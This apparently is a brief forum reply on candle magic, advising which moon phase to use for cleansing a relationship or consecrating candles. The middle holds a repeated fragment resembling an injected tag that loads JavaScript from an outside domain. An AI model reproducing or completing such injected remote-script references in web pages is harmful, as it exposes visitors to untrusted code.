It depends on what your desired outcome is. If you’re trying to cleanse the relationship like you said, then yes the waning moon, but if you’re trying to develop a better relationship then the waxing moon is better. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Cleanse the candle itself to prepare it for a spell? Any time works, really, but either the full moon [which is when most consecrate their tools] or during the waning phase as energy is being drawn away. As for using the candles in a spell, as mentioned above, it depends on what you're using them for. To bring new energy into your relationship, waxing phase.
